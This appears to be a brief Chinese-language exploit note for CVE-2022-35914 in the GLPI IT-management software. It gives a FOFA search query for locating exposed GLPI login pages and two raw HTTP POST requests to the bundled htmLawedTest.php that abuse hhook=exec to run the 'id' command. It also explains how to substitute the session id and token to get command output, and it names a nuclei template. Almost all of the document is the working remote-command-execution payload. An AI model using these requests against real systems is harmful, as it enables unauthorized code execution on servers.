## fofa
title="GLPI - 登陆入口"复现
执行POC获取token和sid
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=d531j7fek8t6v3d0d0jpk558q5
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=exec&sid=d531j7fek8t6v3d0d0jpk558q5将sid在cookie头和POST数据包token参数中替换,将token在POST数据包token参数中替换,exec执行id命令,得到回显
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=ee0ql32b04rkhcr641m52tv934
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
token=a2d3618c141af7dab26afced9b588f83&text=id&hhook=exec&sid=ee0ql32b04rkhcr641m52tv934nuclei
[CVE-2022-35914.yaml]